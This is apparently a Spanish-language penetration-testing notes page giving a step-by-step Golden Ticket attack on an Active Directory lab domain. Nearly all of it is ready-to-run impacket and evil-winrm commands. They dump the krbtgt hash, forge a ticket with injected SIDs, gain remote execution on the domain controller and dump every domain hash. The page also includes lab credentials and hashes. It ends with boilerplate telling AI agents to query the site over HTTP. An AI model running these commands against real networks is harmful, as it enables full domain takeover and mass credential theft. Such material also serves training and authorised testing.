# Golden Ticket Attack

El "Golden Ticket" permite crear tickets TGT falsificados usando la clave de servicio de `krbtgt`, lo que otorga acceso completo al dominio.

Para esto necesitas:

* El hash de la cuenta `krbtgt`
* El nombre del dominio
* El SID del dominio

Ejemplo con `impacket-psexec`:

```
impacket-psexec enterprise.com/Administrator:'Password'@IP(AD)
```

> Este acceso es útil para moverse lateralmente dentro del dominio una vez generado un TGT válido.

#### Paso 1: Obtener el hash krbtgt

Conseguir hash NTLM del usuario krbtgt con un usuario y contraseña

```
impacket-secretsdump -debug child/corpmngr:'User4&*&*'@cdc.child.warfare.corp -just-dc-user 'child\krbtgt'
```

<figure><img src="/files/0fk8qRANVs1R68CaEpBT" alt=""><figcaption></figcaption></figure>

#### Paso 2: Obtener SID del dominio y subdominio

**Dominio**

```
impacket-lookupsid child/corpmngr:'User4&*&*'@warfare.corp
```

<figure><img src="/files/hKgZGUfCBoMGCnMbCd8Z" alt=""><figcaption></figcaption></figure>

**Subdominio**

```
impacket-lookupsid child/corpmngr:'P4ssw0rd'@domain.corp
```

<figure><img src="/files/102VARFjQpspnINrkBcv" alt=""><figcaption></figcaption></figure>

* Hasta ahora hemos conseguido lo siguiente:

```
1. krbtgt aes256 Hash  
ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2  

2. Parent SID (Dominio): S-1-5-21-3375883379-808943238-3239386119  

3. Child SID (Subdominio): S-1-5-21-3754860944-83624914-1883974761
```

#### Paso 3: Crear el golden Ticket

```
impacket-ticketer -domain child.warfare.corp -aesKey ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2 -domain-sid S-1-5-21-3754860944-83624914-1883974761 -groups 516 -user-id 1106 -extra-sid S-1-5-21-3375883379-808943238-3239386119-516,S-1-5-9 'corpmngr'
```

<figure><img src="/files/3zyF2raXnxYUzYVxS9qR" alt=""><figcaption></figcaption></figure>

Guardaremos el ticket en una variable.

```
export KRB5CCNAME=corpmngr.ccache
```

#### Paso 4: Solicitar Ticket de Servicio

```
getST.py -spn 'CIFS/dc01.warfare.corp' -k -no-pass child.warfare.corp/corpmgr -debug
```

<figure><img src="/files/jIzeYN4NIjYMwPSPqoHG" alt=""><figcaption></figcaption></figure>

Configurar nuevo ticket:

```
export KRB5CCNAME=corpmngr@CIFS_dc01.warfare.corp@WARFARE.CORP.ccache
```

#### Paso 5: Acceder

**Ejemplo 1: Acceso via SMB (CIFS)**

```
# Acceder a shares del Domain Controller
impacket-smbclient -k -no-pass dc01.warfare.corp

# O usando smbclient nativo
smbclient -k //dc01.warfare.corp/C$
```

**Ejemplo 2: Ejecución remota de comandos**

```
# Ejecutar comandos en el DC via WinRM
evil-winrm -i dc01.warfare.corp -k

# O via impacket-wmiexec
impacket-wmiexec -k -no-pass warfare.corp/corpmngr@dc01.warfare.corp
```

**Ejemplo 3: Dump de hashes del dominio**

```
# Dumpear todos los hashes del dominio
impacket-secretsdump -k -no-pass warfare.corp/corpmngr@dc01.warfare.corp
```

**Ejemplo 4: Acceso a otros servicios**

```
# LDAP
impacket-ldapdomaindump -k -no-pass warfare.corp/corpmngr@dc01.warfare.corp

# MSSQL (si hay instancias)
impacket-mssqlclient -k warfare.corp/corpmngr@sqlserver.warfare.corp
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://alv-fh.gitbook.io/alv-fh/windows-privilege-escalation/golden-ticket-attack.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.